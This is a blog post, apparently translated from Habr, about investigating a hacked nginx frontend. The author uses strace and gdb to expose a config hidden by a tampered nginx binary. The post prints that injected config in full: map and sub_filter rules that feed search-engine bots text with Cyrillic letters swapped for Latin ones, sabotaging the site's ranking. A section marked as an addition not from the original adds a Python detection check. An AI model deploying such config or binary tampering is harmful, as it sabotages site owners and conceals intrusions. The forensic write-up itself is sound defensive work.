When 'a' is not equal to 'a'. After the hack

A very unpleasant story happened to one of my friends. But however unpleasant it was for Mikhail, it was just as engrossing for me.

I should say that my friend is a decent UNIX user: he can install mysql and php himself and write simple nginx configs.
And he has a dozen or a dozen and a half websites dedicated to power tools.

One of these sites, dedicated to chainsaws, sat firmly in the TOP of the search engines. The site is a non-commercial review site, but someone got into the habit of attacking it. First DDoS, then brute force, then dirty comments and abuse complaints sent to the hosting provider and to RKN.
Suddenly everything went quiet, and this quiet turned out to be for the worse: the site began slipping out of the top lines of the search results.


That was the preface; now for the admin's story.

It was nearly bedtime when the phone rang: "San, could you take a look at my server? It seems to me I've been hacked. I can't prove it, but the feeling hasn't left me for three weeks now. Maybe it's time to get treated for paranoia?"

What followed was a half-hour discussion that can be summarized as follows:

  • the ground for a break-in was fertile;
  • an attacker could have obtained superuser rights;
  • the attack (if it happened) was aimed specifically at this site;
  • the problem areas have been fixed, and now we need to understand whether there was an intrusion;
  • the hack could not have affected the site code or the databases.

Regarding the last point.


Only the public ("white") IP of the frontend faces the world. There is no exchange between the backends and the frontend other than http(s), the users/passwords are different, and no keys were exchanged. On the private ("gray") addresses, all ports except 80/443 are closed. The public IPs of the backends are known only to two users, whom Mikhail trusts completely.

Debian 9 is installed on the frontend, and by the time of the call the system had been isolated from the world by an external firewall and stopped.

"Okay, give me access," I decided to put off sleep for an hour. "I'll see it with my own eyes."

Here and below:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Searching for a possible hack

I start the server, first in rescue mode. I mount the disks and dig through them for auth logs, shell history, system logs and so on; where possible I check file creation dates, although I understand that a normal cracker would have "swept up" after himself, and Misha had already "trampled" around a lot while searching on his own.

I start in normal mode and, not yet quite understanding what to look for, I study the config. First of all I am interested in nginx, since there is essentially nothing else on the frontend besides it.
The config is small and neatly arranged in a dozen files; I simply cat them one after another. Everything looks clean, but you never know whether I missed some include, so let me produce a full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I didn't get it: "Where is the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question joined the listing question: "Why such an old nginx version?"

Moreover, the system believes that the latest version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call him:
- Misha, why did you rebuild nginx?
- Wait, I don't even know how to do that!
- Okay, go to sleep...

Nginx was clearly rebuilt, and the "-T" listing output was hidden for a reason. There is no more doubt about the hack; you could simply accept it and (since Misha had replaced the server with a new one) consider the problem solved.

And indeed, since someone had obtained root rights, the only sensible thing to do is reinstall, and there was no point in hunting for what had gone wrong there; but this time curiosity overcame sleep. How can we find out what they wanted to hide from us?

Let's try to trace it:

$ strace nginx -T

Looking at the trace, there are clearly not enough lines of the form

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare the results.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I assume that this fragment of /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so that the "-T" listing is not shown.

But how can we look at our config?

If my guess is correct and the problem lies only in the variable ngx_dump_config, let's try to set it with gdb; fortunately the build has the --with-cc-opt='-g ...' flag, and hopefully the -O2 optimization won't get in our way. At the same time, since I don't know exactly how ngx_dump_config might be handled inside case 'T':, we won't go through that block at all, but set the variable while running with case 't':

Why '-t' can be used instead of '-T': the if (ngx_dump_config) block is processed inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Of course, if the code was also changed in this part and the dump no longer happens here, my method will not work.

Test nginx.conf

Having already solved the problem, testing showed that the malware needs a minimal nginx config of the form:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We will use it for brevity in the article.

Start the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Step by step:

  • set a breakpoint on the main() function
  • start the program
  • change the value of the variable that controls config output: ngx_dump_config=1
  • continue/finish the program

As we can see, the real config differs from ours; we pick out the parasitic fragment from it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's look at what happens here, in order.

The User-Agent of yandex/google is detected:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

Wordpress service pages are excluded:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for those who fall under both of the conditions above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of the html pages Cyrillic 'о' is replaced with Latin 'o' and Cyrillic 'а' with Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Yes, the whole trick is that 'а' != 'a', just as 'о' != 'o' (Cyrillic on the left, Latin on the right).


So, instead of normal 100% Cyrillic text, the search engine bots receive doctored garbage diluted with Latin 'a' and 'o'. I won't try to discuss how this affects SEO, but it is unlikely that such a jumble of letters has a positive effect on positions in the search results.
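An added example, not from the original article: a small Python model of the parasitic maps and sub_filter above, plus the defender-side check I would run against a site, fetching the same URI as a browser and as Googlebot and flagging words that mix Cyrillic and Latin letters. The page body, the browser User-Agent and the fake fetch are constructed here for an offline run.

```python
import re
import unicodedata

# Constructed sample: the all-Cyrillic page body an ordinary visitor receives.
CLEAN_HTML = "<p>Бензопила работает хорошо, масло и цепь в норме.</p>"

# The two User-Agent patterns and the URI pattern from the hidden config
# (nginx "~*" means a case-insensitive regex).
BOT_UA_RE = re.compile(r"yandex.com/bots|www.google.com/bot.html", re.I)
WP_URI_RE = re.compile(r"/wp-", re.I)


def sign_filter(html, user_agent, uri):
    """Model of the parasitic maps + sub_filter: only a search-engine bot
    requesting a non-/wp- URI gets Cyrillic 'о'/'а' swapped for Latin 'o'/'a'."""
    if BOT_UA_RE.search(user_agent) and not WP_URI_RE.search(uri):
        return html.replace("\u043e", "o").replace("\u0430", "a")
    return html


def mixed_script_words(text):
    """Words containing both Cyrillic and Latin letters: the fingerprint this
    tampering leaves, since a genuine Russian word never holds a Latin 'a' or 'o'."""
    found = []
    for word in re.findall(r"\w+", text):
        scripts = {unicodedata.name(ch).split()[0] for ch in word if ch.isalpha()}
        if {"CYRILLIC", "LATIN"} <= scripts:
            found.append(word)
    return found


def cloaking_check(fetch, uri):
    """Fetch one URI as a browser and as Googlebot through the caller-supplied
    fetch(user_agent, uri); return (bodies differ?, suspicious words in the bot copy)."""
    browser = fetch("Mozilla/5.0 (X11; Linux x86_64)", uri)
    bot = fetch("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", uri)
    return browser != bot, mixed_script_words(bot)


if __name__ == "__main__":
    # Offline demo: the fake fetch answers from the constructed page via the modelled filter.
    fake_fetch = lambda ua, uri: sign_filter(CLEAN_HTML, ua, uri)
    for path in ("/review/chainsaw", "/wp-login.php"):
        differs, words = cloaking_check(fake_fetch, path)
        print(path, "cloaked" if differs else "identical", words)
```

Against a live host, replace fake_fetch with a function that performs the two HTTP requests and returns the body; a non-empty word list on a page that should be pure Cyrillic is the signal.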

What can I say: guys with imagination.

References

Debugging with GDB
gdb(1) - Linux man page
strace(1) - Linux man page
Nginx - Module ngx_http_sub_module
About saws, chainsaws and electric saws

Source: www.habr.com
